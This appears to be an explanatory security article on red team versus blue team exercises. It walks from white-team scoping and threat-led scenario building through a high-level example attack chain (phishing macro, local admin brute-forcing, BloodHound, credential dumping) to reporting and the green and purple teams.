Cybersecurity experts fill our days with terminology from warfare, including jargon such as red team versus blue team. The concept of ‘red team’ has its origin in wargaming. The red team plays an opposing force and attempts to bypass the barriers of the defending or blue team.
These exercises are not about winning or losing. They help hedge against unpleasant surprises and are a safe way for organizations to test their resilience against attacks.
The exercises highlight weaknesses in defenses and reveal misconceptions or flaws in attack detection. Red team testing, or ethical hacking, does not solely focus on testing technology. It also attempts to find loopholes in processes and weaknesses in how people interact with computer systems.
Needless to say, the experts don’t kick off a red team versus blue team exercise randomly. They use a well-laid-out and designed plan. As a matter of fact, a red team engagement or ethical hacking is not just ‘executing an attack’. Teams often spend more time planning the scenarios than on the actual attack.
Red Team Versus Blue Team Pre-Engagement
In the first phase, the blue team stays in the dark. Another actor gets involved: the white team. The members of the white team are the only people that know of the red team exercise. The team includes the chief information security officer (CISO) and subject matter experts on the tested areas.
The white team referees the engagement and ensures the exercise runs fairly and does not cause operational problems. The white team agrees with the red team on the scope, the timing and the rules of engagement.
As a last step, the white team confirms the composition of the red team and the teams agree on a single point of contact in case of problems. If the exercise has physical components, the teams also agree on a so-called ‘get-out-of-jail’ letter. The red team uses this document when they get caught to prove the organization arranged the exercise.
Reconnaissance of the Victim
Once the teams have set the scope, the red team gathers intelligence on the victim and the sector or business the victim operates in. This allows them to build a footprint of its future target and decide on possible entries. If the scoping permits, the footprint can be extended with a map of the other organizations the victim often interacts with. The attackers can abuse these trusted connections to gain access to the victim.
Although the red team is now eager to start its attack, there’s one more phase to go through.
Red Team Scenario Building
The goal of the whole exercise is to be as realistic as possible. So, the red team researches the threat actors known to have targeted the victim or the sector in which the victim operates. They explore the typical tactics, techniques and procedures (TTPs) employed by these threat actors. The objective is to present a credible picture of the threats the victim is facing, based on real-world examples.
More advanced red teams can execute this phase alongside specific intelligence providers. The TIBER-EU Framework includes space for an external provider to compile the threat intelligence on a victim and deliver it to the red team so they can use it.
Armed with the TTPs, the red team develops a plan. To be successful, the red team maps a chain of techniques to be used on a model, for example, the Unified Cyber Kill Chain. This allows them to find their way from initial access to their final objectives, hidden deep in the victim’s network.
Once they compile and approve the plan, the red team deploys the required infrastructure and starts running the attack.
Attack Delivery
In this phase, the red team gets their hands dirty and can show off their skills.
Red Team Versus Blue Team: Initial Foothold
A common attack scenario for an initial foothold consists of sending a phishing email and luring a user into opening an infected document. Remember we mentioned mapping trusted connections? Pretending to be someone belonging to an organization with whom the victim often works is an easy and proven way to convince a user to open a document. From a blue team perspective, this is not easy to defend. A red team will often not use an ‘off-the-shelf’ malicious document. This means that mail filtering and antivirus software are less likely to detect the attack.
Depending on what the red team does, the blue team can pick up early signals of the attack. Emails from newly registered domains or domains with uncommon digital certificates might tip them off that something strange is happening.
Local Administrator
Some businesses and agencies boost their defenses with Endpoint Detection and Response solutions. This assists blue teams by highlighting (and sometimes blocking) the odd activity that is the result of opening a malicious document. For example, the attackers might send a Word document that, once macros are enabled, launches an instance of PowerShell. In normal cases, a Word process will not launch a scripting engine. This is something the blue team can look for, or be notified of. However, a lot of organizations do not have EDR. Luckily for our attack scenario, this is also the case with our victim.
Once the red team installs the malicious code and infects the workstation, they attempt to gain higher privileges. The malware gave them the privileges of a normal user. Now, they want to obtain the privileges of a local administrator. Many organizations use local admin accounts for IT maintenance or have them as part of a default installation. The red team can use these to gain access to other workstations. The red team has a simple attack technique to obtain these credentials: brute-forcing.
Brute-Forcing
Armed with a default word list, consisting of keywords assembled in the earlier reconnaissance and scenario building phase, the red team attempts to guess the password of a local admin. Sure enough, it doesn’t take long for the team to discover a working username and password. This gives them local admin access to the workstation.
In a lot of cases, the blue team will be blind for this portion. Local authentication attempts are often not logged centrally, so the blue team will not detect them.
Network Propagation
Now that they have wider access, the red team will focus on workstations where a domain admin is logged in. Especially in larger environments, finding such workstations can be challenging and time-consuming. It’s also a chance for the blue team to spot the attack. The red team must not despair, though. As it happens, there is a tool that makes this step easier: BloodHound.
With BloodHound, the red team can automate the process of finding workstations with domain admin sessions. At this stage, the blue team can showcase how they prepared for this type of attack. The blue team has a set of decoy users. Any attempt to use these decoy users is logged and alerted to the blue team. When the blue team discovers this, they inform the CISO.
The CISO, as part of the white team, informs the liaison of the red team that their intrusion has been detected. This is, however, not the end of the exercise. Instead of letting the blue team have its way and have them contain and remove the red team from the environment, they get instructions to stand down. The white team instructs the red team to proceed with their attack scenario to obtain domain admin credentials.
Actions on Objectives
The results of BloodHound give the red team the attack path that they need to follow. The graph of BloodHound indicates a workstation with a domain administrator currently logged in. The team uses the previously obtained local administrator credentials to get access to this workstation. After gaining access, they dump the Windows process containing the login credentials of the domain administrator. This finally brings them to their objective: acquiring domain administrator credentials for the victim’s domain.
A note on actions on objectives. The objectives of a real threat actor are rarely about getting domain administrator credentials. Their objectives are rather to use these credentials to access sensitive information or conduct sabotage or fraud.
Analysis and Reporting: After the Ethical Hacking
The red team exercise does not stop with demonstrating that the team reached the objective. Instead, they give a full report detailing the execution of the scenario, the findings and the recommendations. The report includes:
- The attack scenario and the used techniques, with the results (proof) of the execution of these techniques
- A set of findings, or weaknesses, discovered during the exercise that allowed the red team to progress
- A risk rating of these findings and their potential impact. The report details how they can be mitigated. It also documents how the blue team can improve detection for these techniques.
- A roadmap with recommendations which findings to resolve first. Resolving one weakness can sometimes limit the impact of other, related, weaknesses.
- Advice on areas for improvement in terms of technical controls, policies and procedures and education and awareness
- Guidelines for the blue team on how to replay the attack scenario, after the improvements have been implemented.
In this final step, it’s time to introduce yet another actor: the green team. In most organizations, it will not be the blue team that oversees the security improvements, but rather the green team. This team removes weaknesses or puts mitigative controls in place. They take care of improved logging capabilities and assist the blue team with automation and getting alerts of unusual activity.
There’s one more color we have to cover: purple team. A purple team is not a separate actor. A purple team is about the specific interactions between the offensive side and the defensive side with the goal of improving the blue team’s detection and response capabilities.
After all, cybersecurity language isn’t short of colorful jargon. And it takes all of these teams to run an exercise that teaches the organization how to defend itself better.